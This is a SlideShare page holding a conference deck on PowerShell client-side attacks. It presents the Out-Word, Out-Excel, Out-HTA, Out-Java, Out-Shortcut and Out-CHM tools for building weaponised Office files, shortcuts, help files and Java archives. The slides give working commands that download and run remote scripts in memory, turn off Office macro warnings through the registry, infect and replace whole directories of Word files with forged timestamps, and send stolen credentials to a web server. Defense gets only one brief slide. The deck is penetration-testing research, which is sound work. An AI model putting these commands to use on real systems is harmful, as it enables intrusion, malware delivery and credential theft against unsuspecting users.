SlideShare a Scribd company logo

Client side attacks using PowerShell

Download as PPTX, PDF
Nikhil Mittal, profile picture
Nikhil Mittal

This document discusses using PowerShell for lethal client-side attacks. It introduces several tools created by the author (Out-Word, Out-Excel, etc.) that generate malicious Microsoft Office files, shortcuts, HTML files and Java files containing PowerShell payloads. These payloads allow executing commands, downloading/running scripts and more complex attacks on the victim's system. The document provides examples usage and discusses using PowerShell's capabilities for effective post-exploitation on client machines. It concludes with recommendations for defense and credits references used in developing the tools.

Technology
Related topics:
Penetration-Testing Information Security
1 of 47
Downloaded 381 times
1
2
3
4
5
6
7
Most read
8
9
10
11
12
13
Most read
14
Most read
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
Lethal Client Side Attacks using PowerShell Nikhil Mittal
Get-Host • SamratAshok • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Creator of Kautilya and Nishang • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks – Clubhack’10, Hackfest’11, Clubhack’11, Black hat Abu Dhabi’11, Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, Troopers’14 DeepSec 2014 2
Get-Content • Client Side Attacks • What is PowerShell • Why PowerShell? • Using PowerShell for client side attacks – Out-Word – Out-Excel – Out-Shortcut – Out-CHM – Out-Java – Out-HTA • Defense against such attacks. • Conclusion DeepSec 2014 3
“Of war, there is open war, concealed war and silent war…..one can prevail only by maintaining secrecy when striking again and again” – Chanakya DeepSec 2014 4
Client Side Attacks • Server side is being locked down like never before. There are protection measures, patching and extensive monitoring on the server side. Though, there is no dearth of vulnerabilities on the server side, exploiting those is getting more and more difficult. • I noticed unprecedented pace by clients while applying patches for HeartBleed, ShellShock etc. • There are higher chances to get noticed if we are using Server side attacks. DeepSec 2014 5
Client Side Attacks • The client side is still a lesser priority when it comes to patches, monitoring and other security measures. • The “perimeter-ized” network is still the norm. • I still found older versions of Adobe Reader on client machines during penetration tests. • There are less chances of getting caught if the attack begins from a user’s machine. DeepSec 2014 6
Client Side Attacks • Another thing which helps in the client side attacks is, when users use same credentials, data, servers, emails on daily basis, they tend to become casual about those. They cease to attach much importance to those things as they seem normal to them. DeepSec 2014 7
Client Side Attacks • It is still better not to use exploitation of memory corruption bugs in client side attacks. Generally, those are more prone to get caught. • It would be really nice if we are able to launch client side attacks with things built-in or native to the Operating System which we have to target. • This is where PowerShell comes in the picture. DeepSec 2014 8
What is PowerShell • “Windows PowerShell® is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en-us/ library/bb978526.aspx DeepSec 2014 9
Why PowerShell • A shell and scripting language already present on the most general targets in a penetration test. • A powerful method to “reside” in the systems and network. • Provides easy access to .Net classes, WMI, Windows API, WinRM, Registry etc. • Less dependence on msf and *nix scripting scripts converted to executables. DeepSec 2014 10
Using PowerShell for Client Side Attacks • Using PowerShell in a client side attack results in impressive post exploitation. • We could not only have access to everything on the system very easily using PowerShell but also to other machines on the domain network. • That makes it an ideal script for such attacks. DeepSec 2014 11
Using PowerShell for Client Side Attacks • Lets begin with Microsoft Office Documents. DeepSec 2014 12
Out-Word.ps1 • Use Out-Word to generate “armed” or “infected” MS Word documents. • The generated Word document has an auto executable macro which runs the provided PowerShell payload. • The PowerShell payload executes silently without affecting the normal usage of the Word document. DeepSec 2014 13
Out-Word.ps1 • Below command generates a Word file, named Salary_Details.doc Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" • Though you would be unable to see the output in above example, lets see what happened. DeepSec 2014 14
Out-Word.ps1 • Notice that we are not getting any warning regarding Macros when we open the Doc. Why? Because of these in the code New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name AccessVBOM -Value 1 -Force | Out-Null New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name VBAWarnings -Value 1 -Force | Out-Null DeepSec 2014 15
Out-Word.ps1 • We have effectively disabled Word Macro Security on the computer where the script is executed. – So, if we execute the script on our system and send the files to the target, he will see the warning. – But, if the script is executed on the target computer, no such warning would be displayed. DeepSec 2014 16
Out-Word.ps1 • The default payload with the script is to download and execute, in memory, a PowerShell script. Thus, the easiest way to use it is: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 DeepSec 2014 17
Out-Word.ps1 • The URL is passed to below code: powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New- Object Net.WebClient).DownloadString('$ PayloadURL'));$Arguments" DeepSec 2014 18
Out-Word.ps1 • Note that we could also pass arguments to the script getting downloaded. For example: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -Arguments Evil • This is useful when the script loads a function in memory or a PowerShell Module is used. • The Macro code uses WMI to create a process out of the payload we pass onto it. DeepSec 2014 19
Out-Word.ps1 • Now, what if we get access to a fileserver and want to infect all files or files in a particular directory? Use below command: Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:docfiles • In above, in the C:docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name and same LastWriteTime. DeepSec 2014 20
Out-Word.ps1 • Use the –Recurse option to recursively generate .doc files in the docfiles directory Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -WordFileDir C:docfiles - Recurse • Use –RemoveDocx, to delete the original docx files after doc files have been generated. DeepSec 2014 21
Out-Word.ps1 • LastWriteTime of the docx file is copied to the newly generate infected file to make it look auhtentic. • Also, if the file extensions for known file types are hidden. “.docx” is added to the generated doc files. DeepSec 2014 22
Out-Excel.ps1 • Out-Excel works exactly same as Out-Word with same features, payloads etc. • I prefer Out-Excel, as in my experience, users are generally ok with Macros in Excel than in Word. DeepSec 2014 23
Out-HTA.ps1 • Use this to generate HTML Application and accompanying VBScript. These could be deployed on a web server. • When a user opens the HTA, the VBScript is executed which, in turn, executes the specified PowerShell payload. DeepSec 2014 24
Out-HTA.ps1 • The default name of the HTA is WindDef_WebInstall.hta and for VBS it is launchps.vbs • Both the files should be hosted in the same directory of a web server or the HTA should be modified to point to correct path of the VB Script. DeepSec 2014 25
Out-HTA.ps1 • Use below command to generate the files: Out-HTA -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem" • As in other client side attacks we discussed, you can also use a PowerShell Module Out-HTA -PayloadURL http://192.168.254.1/powerpreter.p sm1 -Arguments Check-VM DeepSec 2014 26
Out-Java.ps1 • Out-Java could be used to execute PowerShell commands and scripts. • It outputs four files,a .java file which contains the Java source, a .class file which is the compiled Java class, a manifest.txt file and a JAR executable. • It needs JDK on the attacker’s machine. DeepSec 2014 27
Out-Java.ps1 • Use below command: Out-Java -Payload "Get-Process" - JDKPath "C:Program FilesJavajdk1.7.0_25" • To download and execute a script in memory, use this: Out-Java -PayloadURL http://192.168.254.1/Get- Information.ps1 -JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 28
Out-Java.ps1 • You could also use PowerShell Modules. Out-Java -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 29
Out-Shortcut.ps1 • Out-Shortcut creates a shortcut (.lnk) which could be used for executing PowerShell commands and scripts. • When the target users clicks on the shortcut, which is set to PowerShell, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 30
Out-Shortcut.ps1 • Use below command to execute a PowerShell command: Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass - noprofile -noexit -c Get-ChildItem" • Use below command to download and execute, in memory, a PowerShell script: Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1 DeepSec 2014 31
Out-Shortcut.ps1 • If Out-Shortcut is executed on the target, we can set a Hotkey for the shortcut so that ot executed everytime the key is pressed: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - HotKey 'F3' -Icon 'notepad.exe' DeepSec 2014 32
Out-CHM.ps1 • We could also use Compiled HTML Help files (CHM) to execute PowerShell commands and scripts. • When the target opens the CHM file, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 33
Out-CHM.ps1 • Use below command to execute a PowerShell command Out-CHM -Payload "Get-Process" - HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 34
Out-CHM.ps1 • Use below command to execute encoded command/script. Out-CHM -Payload "- EncodedCommand <>" -HHCPath "C:Program Files (x86)HTML Help Workshop" Use Invoke-Encode from Nishang for encoding. DeepSec 2014 35
Out-CHM.ps1 • Use below command to download and execute a script in memroy. Out-CHM -PayloadURL http://192.168.254.1/Get- Information.ps1 -HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 36
More complex attacks • Any of the discussed, could be used for more effective attacks like: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments "Credentials | Do-Exfiltration –ExfilOption Webserver -URL http://192.168.254.183/test/data .php" DeepSec 2014 37
More complex attacks • We could do some really cool stuff, like running a backdoor with a new communications channel Out-Shortcut -PayloadURL “http://192.168.254.1/Gupt- Backdoor.ps1” –Arguments "Gupt-backdoor -MagicString op3n – Verbose” DeepSec 2014 38
More complex attacks • We could do Egress Testing Out-Shortcut -PayloadURL “http://192.168.254.1/FireBuster .ps1” –Arguments “FireBuster 192.168.254.1 4443-4447” DeepSec 2014 39
More complex attacks • Other machines on the network could be port scanned. Out-Shortcut -PayloadURL “http://192.168.254.1/Port- Scan.ps1” –Arguments “Port-Scan - StartAddress 192.168.254.1 - EndAddress 192.168.254.254 - ResolveHost -ScanPort” • We could do a port scan for all the hosts in the current network segment, it is unlikely that we know the network range as in above example. DeepSec 2014 40
More complex attacks • We could also run other client side attacks. For example, lets infect every word file in the C:client directory Out-Shortcut -PayloadURL “http://192.168.254.1/Out- Word.ps1” –Arguments “Out-Word - PayloadURL http://192.168.254.1/Speak.ps1 - WordFileDir C:client” DeepSec 2014 41
More complex attacks • We could force browse or download and execute exploits to escalate privileges. • On Windows 8, we could dump web credentials stored in Windows Vault in plain text (admin privs required). • We could check if the current user has privileges to access other machines on the network. • And much more. DeepSec 2014 42
Defense • Use awareness is the best defense against such attacks. • Removal of VBA from MS Office would help with the office document attacks. But it could break so many things. • Active monitoring of the user machines may also help in detecting such attacks. DeepSec 2014 43
Conclusion • Usage of PowerShell makes these attacks much more lethal and powerful. • We need to not stick to getting a shell, we could go much further using only the client side attacks. • The attacks would continue as long as users continue opening attachments and click on links, that means, for ever :) DeepSec 2014 44
Recommended PowerShell Tools • Nishang • PowerSploit • Posh-SecMod • Veil-PowerView • PowerUp • PoshSec • Kansa • Voyeur • Powercat DeepSec 2014 45
Credits/Reference • Thanks to DeepSec for accepting me. • Macro code for MS Office documents has been taken from Matt’s work: https://github.com/enigma0x3 • The idea for Out-CHM is taken from this tweet and attached file: https://twitter.com/ithurricanept/status/5349 93743196090368 DeepSec 2014 46
Thank You • Questions? • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 47

More Related Content

PPTX
PowerShell for Penetration Testers
Nikhil Mittal
 
PDF
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
PPTX
Metasploit framwork
Deepanshu Gajbhiye
 
PDF
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PPTX
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
PPTX
Linux Network Stack
Adrien Mahieux
 
PPTX
Windows Operating System Archaeology
enigma0x3
 
PPTX
Attacking thru HTTP Host header
Sergey Belov
 
PowerShell for Penetration Testers
Nikhil Mittal
 
DerbyCon 2019 - Kerberoasting Revisited
Will Schroeder
 
Metasploit framwork
Deepanshu Gajbhiye
 
An ACE in the Hole - Stealthy Host Persistence via Security Descriptors
Will Schroeder
 
PowerShell for Practical Purple Teaming
Nikhil Mittal
 
Linux Network Stack
Adrien Mahieux
 
Windows Operating System Archaeology
enigma0x3
 
Attacking thru HTTP Host header
Sergey Belov
 

What's hot (20)

PPTX
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
PPTX
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
PDF
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
ScyllaDB
 
PPTX
I hunt sys admins 2.0
Will Schroeder
 
PDF
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
PDF
Kernel Recipes 2017: Using Linux perf at Netflix
Brendan Gregg
 
PDF
Container Performance Analysis
Brendan Gregg
 
PDF
Pwning in c++ (basic)
Angel Boy
 
PDF
EM13c: Write Powerful Scripts with EMCLI
Gokhan Atil
 
PDF
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
PDF
MySQL Shell for DBAs
Frederic Descamps
 
PPTX
Brute Force Attack and Its Prevention.pptx
hamzajawad10
 
PDF
DoS and DDoS mitigations with eBPF, XDP and DPDK
Marian Marinov
 
PPTX
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
ODT
Comprendre les scripts shell auto-extractible
Thierry Gayet
 
PDF
Play with FILE Structure - Yet Another Binary Exploit Technique
Angel Boy
 
PPTX
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
PPTX
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
PDF
Linux systems - Linux Commands and Shell Scripting
Emertxe Information Technologies Pvt Ltd
 
PDF
EBPF and Linux Networking
PLUMgrid
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
Nikhil Mittal
 
RACE - Minimal Rights and ACE for Active Directory Dominance
Nikhil Mittal
 
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
ScyllaDB
 
I hunt sys admins 2.0
Will Schroeder
 
aclpwn - Active Directory ACL exploitation with BloodHound
DirkjanMollema
 
Kernel Recipes 2017: Using Linux perf at Netflix
Brendan Gregg
 
Container Performance Analysis
Brendan Gregg
 
Pwning in c++ (basic)
Angel Boy
 
EM13c: Write Powerful Scripts with EMCLI
Gokhan Atil
 
0wn-premises: Bypassing Microsoft Defender for Identity
Nikhil Mittal
 
MySQL Shell for DBAs
Frederic Descamps
 
Brute Force Attack and Its Prevention.pptx
hamzajawad10
 
DoS and DDoS mitigations with eBPF, XDP and DPDK
Marian Marinov
 
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
Comprendre les scripts shell auto-extractible
Thierry Gayet
 
Play with FILE Structure - Yet Another Binary Exploit Technique
Angel Boy
 
Kheirkhabarov24052017_phdays7
Teymur Kheirkhabarov
 
Forging Trusts for Deception in Active Directory
Nikhil Mittal
 
Linux systems - Linux Commands and Shell Scripting
Emertxe Information Technologies Pvt Ltd
 
EBPF and Linux Networking
PLUMgrid
 
Ad

Similar to Client side attacks using PowerShell (20)

PDF
The Dark Side of PowerShell by George Dobrea
EC-Council
 
PDF
Power on, Powershell
Roo7break
 
PPTX
Drilling deeper with Veil's PowerTools
Will Schroeder
 
PPTX
Pwning the Enterprise With PowerShell
Beau Bullock
 
PDF
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
PPTX
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
PDF
PowerShell Defcon for Cybersecurity Topics
Dev 010101
 
PPTX
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
PDF
From P0W3R to SH3LL
Arthur Paixão
 
PPTX
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
 
PPTX
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
PPTX
Bsides tampa
Octavio Paguaga
 
PPTX
Pwning with powershell
jaredhaight
 
PPTX
PowerShell: The increased use of PowerShell in cyber attacks
Symantec Security Response
 
PDF
Ranger BSides-FINAL
Christopher Duffy, D.Sc.
 
PPTX
Powering up on PowerShell - BSides Greenville 2019
Fernando Tomlinson, CISSP, MBA
 
PDF
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
PDF
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
PPTX
Bridging the Gap: Lessons in Adversarial Tradecraft
enigma0x3
 
PDF
offensive-Powershell-By-Jihad-Abdrazak.pdf
temp632170
 
The Dark Side of PowerShell by George Dobrea
EC-Council
 
Power on, Powershell
Roo7break
 
Drilling deeper with Veil's PowerTools
Will Schroeder
 
Pwning the Enterprise With PowerShell
Beau Bullock
 
Who Should Use Powershell? You Should Use Powershell!
Ben Finke
 
Lateral Movement - Phreaknik 2016
Xavier Ashe
 
PowerShell Defcon for Cybersecurity Topics
Dev 010101
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
Russel Van Tuyl
 
From P0W3R to SH3LL
Arthur Paixão
 
Incorporating PowerShell into your Arsenal with PS>Attack
jaredhaight
 
Catch Me If You Can: PowerShell Red vs Blue
Will Schroeder
 
Bsides tampa
Octavio Paguaga
 
Pwning with powershell
jaredhaight
 
PowerShell: The increased use of PowerShell in cyber attacks
Symantec Security Response
 
Ranger BSides-FINAL
Christopher Duffy, D.Sc.
 
Powering up on PowerShell - BSides Greenville 2019
Fernando Tomlinson, CISSP, MBA
 
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Priyanka Aash
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Shakacon
 
Bridging the Gap: Lessons in Adversarial Tradecraft
enigma0x3
 
offensive-Powershell-By-Jihad-Abdrazak.pdf
temp632170
 
Ad

More from Nikhil Mittal (11)

PPTX
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
PPTX
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
PPTX
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
PPTX
Workshop: PowerShell for Penetration Testers
Nikhil Mittal
 
PDF
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
PPTX
Powerpreter: Post Exploitation like a Boss
Nikhil Mittal
 
PPTX
Kautilya: Teensy beyond shell
Nikhil Mittal
 
PPTX
Teensy Programming for Everyone
Nikhil Mittal
 
PPTX
More fun using Kautilya
Nikhil Mittal
 
PPTX
Hacking the future with USB HID
Nikhil Mittal
 
PPTX
Owning windows 8 with human interface devices
Nikhil Mittal
 
Red Team Revenge - Attacking Microsoft ATA
Nikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Nikhil Mittal
 
Evading Microsoft ATA for Active Directory Domination
Nikhil Mittal
 
Workshop: PowerShell for Penetration Testers
Nikhil Mittal
 
Continuous intrusion: Why CI tools are an attacker’s best friends
Nikhil Mittal
 
Powerpreter: Post Exploitation like a Boss
Nikhil Mittal
 
Kautilya: Teensy beyond shell
Nikhil Mittal
 
Teensy Programming for Everyone
Nikhil Mittal
 
More fun using Kautilya
Nikhil Mittal
 
Hacking the future with USB HID
Nikhil Mittal
 
Owning windows 8 with human interface devices
Nikhil Mittal
 

Recently uploaded (20)

PPT
Teaching material agriculture food technology
LiaRayya
 
PPTX
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
PPTX
MYSQL Presentation for SQL database connectivity
Swati270511
 
PPTX
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
PDF
Modernizing your data center with Dell and AMD
Principled Technologies
 
PPTX
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
PPTX
Cloud computing and distributed systems.
kkkkkhan
 
PDF
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
PDF
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
PDF
Encapsulation theory and applications.pdf
gurumoop
 
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
PDF
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
PDF
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
PDF
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
PDF
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
PDF
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 
Teaching material agriculture food technology
LiaRayya
 
Understanding_Digital_Forensics_Presentation.pptx
ImranKhan423233
 
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
muhammadmuneebnaeem7
 
MYSQL Presentation for SQL database connectivity
Swati270511
 
Big Data Technologies - Introduction.pptx
kuthubussaman1
 
Modernizing your data center with Dell and AMD
Principled Technologies
 
PA Analog/Digital System: The Backbone of Modern Surveillance and Communication
AVTRON Technologies LLC
 
Cloud computing and distributed systems.
kkkkkhan
 
Peak of Data & AI Encore- AI for Metadata and Smarter Workflows
Safe Software
 
Mobile App Security Testing_ A Comprehensive Guide.pdf
flufftailshop
 
The Rise and Fall of 3GPP – Time for a Sabbatical?
3G4G
 
Encapsulation theory and applications.pdf
gurumoop
 
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
Akar16
 
Encapsulation_ Review paper, used for researhc scholars
gurumoop
 
Machine learning based COVID-19 study performance prediction
IAESIJAI
 
Spectral efficient network and resource selection model in 5G networks
IAESIJAI
 
Building Integrated photovoltaic BIPV_UPV.pdf
SandeepSingh286037
 
NewMind AI Weekly Chronicles - August'25 Week I
NewMind AI
 
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
SynapseIndia
 
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Jian-Hong Pan
 

Client side attacks using PowerShell

  • 1. Lethal Client Side Attacks using PowerShell Nikhil Mittal
  • 2. Get-Host • SamratAshok • Twitter - @nikhil_mitt • Blog – http://labofapenetrationtester.com • Creator of Kautilya and Nishang • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous Talks – Clubhack’10, Hackfest’11, Clubhack’11, Black hat Abu Dhabi’11, Black Hat Europe’12, Troopers’12, PHDays’12, Black Hat USA’12, RSA China’12, EuSecWest’12, Troopers’13, Defcon’13, Troopers’14 DeepSec 2014 2
  • 3. Get-Content • Client Side Attacks • What is PowerShell • Why PowerShell? • Using PowerShell for client side attacks – Out-Word – Out-Excel – Out-Shortcut – Out-CHM – Out-Java – Out-HTA • Defense against such attacks. • Conclusion DeepSec 2014 3
  • 4. “Of war, there is open war, concealed war and silent war…..one can prevail only by maintaining secrecy when striking again and again” – Chanakya DeepSec 2014 4
  • 5. Client Side Attacks • Server side is being locked down like never before. There are protection measures, patching and extensive monitoring on the server side. Though, there is no dearth of vulnerabilities on the server side, exploiting those is getting more and more difficult. • I noticed unprecedented pace by clients while applying patches for HeartBleed, ShellShock etc. • There are higher chances to get noticed if we are using Server side attacks. DeepSec 2014 5
  • 6. Client Side Attacks • The client side is still a lesser priority when it comes to patches, monitoring and other security measures. • The “perimeter-ized” network is still the norm. • I still found older versions of Adobe Reader on client machines during penetration tests. • There are less chances of getting caught if the attack begins from a user’s machine. DeepSec 2014 6
  • 7. Client Side Attacks • Another thing which helps in the client side attacks is, when users use same credentials, data, servers, emails on daily basis, they tend to become casual about those. They cease to attach much importance to those things as they seem normal to them. DeepSec 2014 7
  • 8. Client Side Attacks • It is still better not to use exploitation of memory corruption bugs in client side attacks. Generally, those are more prone to get caught. • It would be really nice if we are able to launch client side attacks with things built-in or native to the Operating System which we have to target. • This is where PowerShell comes in the picture. DeepSec 2014 8
  • 9. What is PowerShell • “Windows PowerShell® is a task-based command-line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en-us/ library/bb978526.aspx DeepSec 2014 9
  • 10. Why PowerShell • A shell and scripting language already present on the most general targets in a penetration test. • A powerful method to “reside” in the systems and network. • Provides easy access to .Net classes, WMI, Windows API, WinRM, Registry etc. • Less dependence on msf and *nix scripting scripts converted to executables. DeepSec 2014 10
  • 11. Using PowerShell for Client Side Attacks • Using PowerShell in a client side attack results in impressive post exploitation. • We could not only have access to everything on the system very easily using PowerShell but also to other machines on the domain network. • That makes it an ideal script for such attacks. DeepSec 2014 11
  • 12. Using PowerShell for Client Side Attacks • Lets begin with Microsoft Office Documents. DeepSec 2014 12
  • 13. Out-Word.ps1 • Use Out-Word to generate “armed” or “infected” MS Word documents. • The generated Word document has an auto executable macro which runs the provided PowerShell payload. • The PowerShell payload executes silently without affecting the normal usage of the Word document. DeepSec 2014 13
  • 14. Out-Word.ps1 • Below command generates a Word file, named Salary_Details.doc Out-Word -Payload "powershell.exe -ExecutionPolicy Bypass -noprofile -noexit -c Get-Process" • Though you would be unable to see the output in above example, lets see what happened. DeepSec 2014 14
  • 15. Out-Word.ps1 • Notice that we are not getting any warning regarding Macros when we open the Doc. Why? Because of these in the code New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name AccessVBOM -Value 1 -Force | Out-Null New-ItemProperty -Path "HKCU:SoftwareMicrosoftOffice$($Wo rd.Version)wordSecurity" -Name VBAWarnings -Value 1 -Force | Out-Null DeepSec 2014 15
  • 16. Out-Word.ps1 • We have effectively disabled Word Macro Security on the computer where the script is executed. – So, if we execute the script on our system and send the files to the target, he will see the warning. – But, if the script is executed on the target computer, no such warning would be displayed. DeepSec 2014 16
  • 17. Out-Word.ps1 • The default payload with the script is to download and execute, in memory, a PowerShell script. Thus, the easiest way to use it is: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 DeepSec 2014 17
  • 18. Out-Word.ps1 • The URL is passed to below code: powershell.exe -ExecutionPolicy Bypass -noprofile -c IEX ((New- Object Net.WebClient).DownloadString('$ PayloadURL'));$Arguments" DeepSec 2014 18
  • 19. Out-Word.ps1 • Note that we could also pass arguments to the script getting downloaded. For example: Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -Arguments Evil • This is useful when the script loads a function in memory or a PowerShell Module is used. • The Macro code uses WMI to create a process out of the payload we pass onto it. DeepSec 2014 19
  • 20. Out-Word.ps1 • Now, what if we get access to a fileserver and want to infect all files or files in a particular directory? Use below command: Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 -WordFileDir C:docfiles • In above, in the C:docfiles directory, macro enabled .doc files would be created for all the .docx files, with the same name and same LastWriteTime. DeepSec 2014 20
  • 21. Out-Word.ps1 • Use the –Recurse option to recursively generate .doc files in the docfiles directory Out-Word -PayloadURL http://yourwebserver.com/evil.ps 1 -WordFileDir C:docfiles - Recurse • Use –RemoveDocx, to delete the original docx files after doc files have been generated. DeepSec 2014 21
  • 22. Out-Word.ps1 • LastWriteTime of the docx file is copied to the newly generate infected file to make it look auhtentic. • Also, if the file extensions for known file types are hidden. “.docx” is added to the generated doc files. DeepSec 2014 22
  • 23. Out-Excel.ps1 • Out-Excel works exactly same as Out-Word with same features, payloads etc. • I prefer Out-Excel, as in my experience, users are generally ok with Macros in Excel than in Word. DeepSec 2014 23
  • 24. Out-HTA.ps1 • Use this to generate HTML Application and accompanying VBScript. These could be deployed on a web server. • When a user opens the HTA, the VBScript is executed which, in turn, executes the specified PowerShell payload. DeepSec 2014 24
  • 25. Out-HTA.ps1 • The default name of the HTA is WindDef_WebInstall.hta and for VBS it is launchps.vbs • Both the files should be hosted in the same directory of a web server or the HTA should be modified to point to correct path of the VB Script. DeepSec 2014 25
  • 26. Out-HTA.ps1 • Use below command to generate the files: Out-HTA -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem" • As in other client side attacks we discussed, you can also use a PowerShell Module Out-HTA -PayloadURL http://192.168.254.1/powerpreter.p sm1 -Arguments Check-VM DeepSec 2014 26
  • 27. Out-Java.ps1 • Out-Java could be used to execute PowerShell commands and scripts. • It outputs four files,a .java file which contains the Java source, a .class file which is the compiled Java class, a manifest.txt file and a JAR executable. • It needs JDK on the attacker’s machine. DeepSec 2014 27
  • 28. Out-Java.ps1 • Use below command: Out-Java -Payload "Get-Process" - JDKPath "C:Program FilesJavajdk1.7.0_25" • To download and execute a script in memory, use this: Out-Java -PayloadURL http://192.168.254.1/Get- Information.ps1 -JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 28
  • 29. Out-Java.ps1 • You could also use PowerShell Modules. Out-Java -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - JDKPath "C:Program FilesJavajdk1.7.0_25" DeepSec 2014 29
  • 30. Out-Shortcut.ps1 • Out-Shortcut creates a shortcut (.lnk) which could be used for executing PowerShell commands and scripts. • When the target users clicks on the shortcut, which is set to PowerShell, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 30
